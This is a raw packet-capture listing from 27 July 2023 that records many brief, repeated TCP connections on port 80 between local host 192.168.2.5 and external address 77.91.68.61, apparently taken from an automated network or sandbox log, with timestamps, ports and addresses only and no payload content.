Jul 27, 2023 01:35:41.378873110 CEST	80	50325	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.379009008 CEST	50325	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.379395962 CEST	50325	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.424154997 CEST	80	50325	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.428633928 CEST	80	50325	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.428767920 CEST	50325	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.538165092 CEST	50325	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.538858891 CEST	50326	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.583900928 CEST	80	50325	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.583945990 CEST	80	50326	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.584006071 CEST	50325	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.584058046 CEST	50326	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.584500074 CEST	50326	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.629856110 CEST	80	50326	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.633169889 CEST	80	50326	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.633250952 CEST	50326	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.740165949 CEST	50326	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.740850925 CEST	50327	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.785952091 CEST	80	50326	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.786047935 CEST	50326	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.786113024 CEST	80	50327	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.786266088 CEST	50327	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.787167072 CEST	50327	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.831831932 CEST	80	50327	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.835562944 CEST	80	50327	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:41.835656881 CEST	50327	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.954828024 CEST	50327	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:41.955512047 CEST	50328	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.000236988 CEST	80	50327	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.000360966 CEST	50327	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.000766039 CEST	80	50328	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.000880957 CEST	50328	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.001266956 CEST	50328	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.047488928 CEST	80	50328	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.051374912 CEST	80	50328	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.051498890 CEST	50328	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.161590099 CEST	50328	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.174742937 CEST	50329	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.207901001 CEST	80	50328	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.207989931 CEST	50328	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.220786095 CEST	80	50329	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.220876932 CEST	50329	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.225192070 CEST	50329	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.271084070 CEST	80	50329	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.275078058 CEST	80	50329	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.275137901 CEST	50329	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.384310961 CEST	50329	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.385616064 CEST	50330	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.428752899 CEST	80	50329	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.428844929 CEST	50329	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.429960012 CEST	80	50330	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.430218935 CEST	50330	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.435326099 CEST	50330	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.479804993 CEST	80	50330	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.484359980 CEST	80	50330	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.484428883 CEST	50330	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.841101885 CEST	50330	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.842128038 CEST	50331	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.885994911 CEST	80	50330	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.887126923 CEST	80	50331	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:42.887269020 CEST	50330	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.887300014 CEST	50331	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:42.969826937 CEST	50331	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.015181065 CEST	80	50331	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.017853022 CEST	80	50331	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.017921925 CEST	50331	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.141285896 CEST	50331	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.142287970 CEST	50332	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.186213017 CEST	80	50331	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.186568022 CEST	80	50332	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.186692953 CEST	50331	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.186743975 CEST	50332	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.188277960 CEST	50332	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.233038902 CEST	80	50332	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.236993074 CEST	80	50332	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.238455057 CEST	50332	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.417253971 CEST	50332	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.418191910 CEST	50333	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.461935997 CEST	80	50332	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.462122917 CEST	50332	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.462536097 CEST	80	50333	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.463063002 CEST	50333	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.481030941 CEST	50333	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.525906086 CEST	80	50333	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.529814959 CEST	80	50333	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.532876968 CEST	50333	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.666553020 CEST	50333	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.667493105 CEST	50334	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.711374998 CEST	80	50333	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.711844921 CEST	80	50334	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.711994886 CEST	50333	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.712040901 CEST	50334	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.718936920 CEST	50334	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:43.764358997 CEST	80	50334	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.768275976 CEST	80	50334	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:43.768434048 CEST	50334	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.493535042 CEST	50334	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.494538069 CEST	50335	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.540060043 CEST	80	50334	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.540153980 CEST	50334	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.540591002 CEST	80	50335	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.540705919 CEST	50335	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.550645113 CEST	50335	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.595082998 CEST	80	50335	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.600317001 CEST	80	50335	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.600451946 CEST	50335	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.723164082 CEST	50335	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.724128962 CEST	50336	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.767668009 CEST	80	50335	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.767807961 CEST	50335	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.768779993 CEST	80	50336	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.768923998 CEST	50336	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.769366980 CEST	50336	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:44.814028978 CEST	80	50336	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.818242073 CEST	80	50336	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:44.818420887 CEST	50336	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.140208006 CEST	50336	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.141300917 CEST	50337	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.185559034 CEST	80	50336	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.185764074 CEST	50336	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.186629057 CEST	80	50337	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.186759949 CEST	50337	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.353512049 CEST	50337	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.399332047 CEST	80	50337	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.475702047 CEST	80	50337	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.475883961 CEST	50337	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.610847950 CEST	50337	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.654413939 CEST	50338	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.656874895 CEST	80	50337	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.656951904 CEST	50337	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.700725079 CEST	80	50338	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.700927973 CEST	50338	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.701903105 CEST	50338	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.748223066 CEST	80	50338	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.753120899 CEST	80	50338	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.753258944 CEST	50338	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.887521029 CEST	50338	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.888673067 CEST	50339	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.933928967 CEST	80	50338	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.934015036 CEST	50338	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.934808969 CEST	80	50339	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.934899092 CEST	50339	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.935966969 CEST	50339	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:46.982275963 CEST	80	50339	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.987174988 CEST	80	50339	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:46.987364054 CEST	50339	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.106626987 CEST	50339	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.107572079 CEST	50340	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.152934074 CEST	80	50339	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.153086901 CEST	50339	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.153872013 CEST	80	50340	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.154037952 CEST	50340	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.167211056 CEST	50340	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.213181973 CEST	80	50340	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.217463017 CEST	80	50340	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.217551947 CEST	50340	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.337013960 CEST	50340	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.338031054 CEST	50341	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.383475065 CEST	80	50340	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.383543015 CEST	80	50341	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.383655071 CEST	50340	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.383739948 CEST	50341	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.395041943 CEST	50341	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.440798044 CEST	80	50341	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.481961012 CEST	80	50341	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.482070923 CEST	50341	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.603879929 CEST	50341	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.604760885 CEST	50342	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.649763107 CEST	80	50341	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.649935961 CEST	50341	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.650746107 CEST	80	50342	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.650841951 CEST	50342	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.651252031 CEST	50342	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.697350025 CEST	80	50342	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.702788115 CEST	80	50342	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.702910900 CEST	50342	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.819865942 CEST	50342	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.820854902 CEST	50343	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.866580963 CEST	80	50343	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.866626024 CEST	80	50342	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.866816044 CEST	50342	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.868953943 CEST	50343	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.878290892 CEST	50343	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:47.923902988 CEST	80	50343	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.928998947 CEST	80	50343	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:47.934489012 CEST	50343	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.072002888 CEST	50343	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.072992086 CEST	50344	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.117871046 CEST	80	50343	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.118995905 CEST	80	50344	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.119149923 CEST	50343	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.119200945 CEST	50344	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.128140926 CEST	50344	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.174015999 CEST	80	50344	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.177835941 CEST	80	50344	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.179084063 CEST	50344	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.287410975 CEST	50344	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.288620949 CEST	50345	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.333539963 CEST	80	50344	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.334765911 CEST	80	50345	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.334924936 CEST	50344	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.334976912 CEST	50345	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.335519075 CEST	50345	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.381618977 CEST	80	50345	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.385715961 CEST	80	50345	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.387073994 CEST	50345	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.491278887 CEST	50345	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.494995117 CEST	50346	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.537668943 CEST	80	50345	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.539069891 CEST	50345	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.540285110 CEST	80	50346	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.542846918 CEST	50346	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.543417931 CEST	50346	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.588648081 CEST	80	50346	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.592477083 CEST	80	50346	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.593626022 CEST	50346	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.708893061 CEST	50346	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.709986925 CEST	50347	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.754513979 CEST	80	50346	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.754651070 CEST	50346	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.755743980 CEST	80	50347	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.755877018 CEST	50347	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.756316900 CEST	50347	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.802270889 CEST	80	50347	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.806799889 CEST	80	50347	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.806915998 CEST	50347	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.912425041 CEST	50347	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.914455891 CEST	50348	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.958549023 CEST	80	50347	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.958667040 CEST	50347	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.960164070 CEST	80	50348	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:48.960278988 CEST	50348	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:48.963702917 CEST	50348	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.008776903 CEST	80	50348	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.012202978 CEST	80	50348	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.012299061 CEST	50348	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.119164944 CEST	50348	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.120130062 CEST	50349	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.164638996 CEST	80	50348	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.164741993 CEST	50348	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.165950060 CEST	80	50349	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.166070938 CEST	50349	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.166542053 CEST	50349	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.212311029 CEST	80	50349	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.216916084 CEST	80	50349	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.217041969 CEST	50349	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.335460901 CEST	50349	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.336426020 CEST	50350	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.382375956 CEST	80	50350	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.382406950 CEST	80	50349	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.382587910 CEST	50349	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.383066893 CEST	50350	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.383153915 CEST	50350	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.427762032 CEST	80	50350	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.430820942 CEST	80	50350	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.430893898 CEST	50350	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.538440943 CEST	50350	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.539422989 CEST	50351	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.583235025 CEST	80	50350	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.583395958 CEST	50350	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.584163904 CEST	80	50351	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.584317923 CEST	50351	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.585645914 CEST	50351	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.630615950 CEST	80	50351	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.634727001 CEST	80	50351	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.634905100 CEST	50351	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.740226984 CEST	50351	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.741178989 CEST	50352	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.785461903 CEST	80	50351	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.785630941 CEST	50351	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.786578894 CEST	80	50352	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.786731005 CEST	50352	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.787822008 CEST	50352	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.833300114 CEST	80	50352	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.837008953 CEST	80	50352	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:49.837188959 CEST	50352	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.996912956 CEST	50352	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:49.997823954 CEST	50353	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.042067051 CEST	80	50352	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.042121887 CEST	80	50353	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.042203903 CEST	50352	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.042279959 CEST	50353	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.042759895 CEST	50353	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.087455988 CEST	80	50353	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.104644060 CEST	80	50353	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.104732990 CEST	50353	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.209073067 CEST	50353	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.209953070 CEST	50354	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.254487991 CEST	80	50353	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.254662037 CEST	50353	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.255357027 CEST	80	50354	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.255477905 CEST	50354	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.256047964 CEST	50354	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.301498890 CEST	80	50354	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.306216002 CEST	80	50354	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.306375027 CEST	50354	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.412319899 CEST	50354	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.413151979 CEST	50355	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.457988977 CEST	80	50355	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.458026886 CEST	80	50354	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.458096027 CEST	50355	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.458127975 CEST	50354	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.459857941 CEST	50355	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.505456924 CEST	80	50355	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.508991957 CEST	80	50355	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.509094000 CEST	50355	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.622644901 CEST	50355	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.623450994 CEST	50356	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.669214010 CEST	80	50355	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.669337034 CEST	50355	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.670711994 CEST	80	50356	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.670839071 CEST	50356	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.705722094 CEST	50356	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.751605034 CEST	80	50356	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.756253958 CEST	80	50356	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.756367922 CEST	50356	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.865830898 CEST	50356	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.866455078 CEST	50357	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.911134005 CEST	80	50356	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.911165953 CEST	80	50357	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.911223888 CEST	50356	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.911278009 CEST	50357	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.913325071 CEST	50357	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:50.958312988 CEST	80	50357	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.962451935 CEST	80	50357	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:50.962626934 CEST	50357	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.081923962 CEST	50357	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.083017111 CEST	50358	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.126569986 CEST	80	50357	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.126693964 CEST	50357	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.127825022 CEST	80	50358	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:51.127935886 CEST	50358	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:51.128406048 CEST	50358	80	192.168.2.5	77.91.68.61
